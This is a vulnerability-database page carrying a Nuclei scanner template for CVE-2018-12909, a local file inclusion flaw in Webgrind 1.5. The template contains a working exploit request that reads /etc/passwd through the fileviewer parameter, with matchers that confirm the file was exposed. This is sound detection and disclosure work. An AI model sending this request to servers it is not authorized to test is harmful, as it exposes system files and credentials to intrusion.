Lucene search
K

Webgrind <= 1.5 - Local File Inclusion

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 25 Views

Webgrind 1.5 Local File Inclusion allows viewing files from the webserver's local filesystem via UR

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNVD
Unspecified Vulnerability in Webgrind
4 Jul 201800:00
cnvd
CVE
CVE-2018-12909
27 Jun 201816:00
cve
Cvelist
CVE-2018-12909
27 Jun 201816:00
cvelist
NVD
CVE-2018-12909
27 Jun 201816:29
nvd
Prion
Input validation
27 Jun 201816:29
prion
Positive Technologies
PT-2018-11466 · Webgrind · Webgrind
27 Jun 201800:00
ptsecurity
RedhatCVE
CVE-2018-12909
22 May 202502:56
redhatcve
id: CVE-2018-12909

info:
  name: Webgrind <= 1.5 - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: |
    Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer&file= URI
  impact: |
    Unauthenticated attackers can read arbitrary files including sensitive configuration files, database credentials, and system files that the web server has access to.
  remediation: |
    Upgrade Webgrind to a version higher than 1.5 or apply the necessary patches provided by the vendor.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Webgrind%20fileviewer.phtml%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CVE-2018-12909.md
    - https://github.com/jokkedk/webgrind/issues/112
    - https://nvd.nist.gov/vuln/detail/CVE-2018-12909
    - https://github.com/KayCHENvip/vulnerability-poc
    - https://github.com/Miraitowa70/POC-Notes
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-12909
    cwe-id: CWE-22
    epss-score: 0.18568
    epss-percentile: 0.9688
    cpe: cpe:2.3:a:webgrind_project:webgrind:1.5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: webgrind_project
    product: webgrind
    fofa-query:
      - app="Webgrind"
      - app="webgrind"
  tags: cve,cve2018,lfi,webgrind,webgrind_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
          - 'webgrind'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206da332582169e0937ba8012d893bb7b71abd3752c3ea4119e3adf5e7850ccbbf0221009488dba4a67c1cecfa0861ae6fb4b8c4e81409bd4b05709e2602e1dfd52cd9dd:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 37.5
CVSS 27.8
EPSS0.18568
25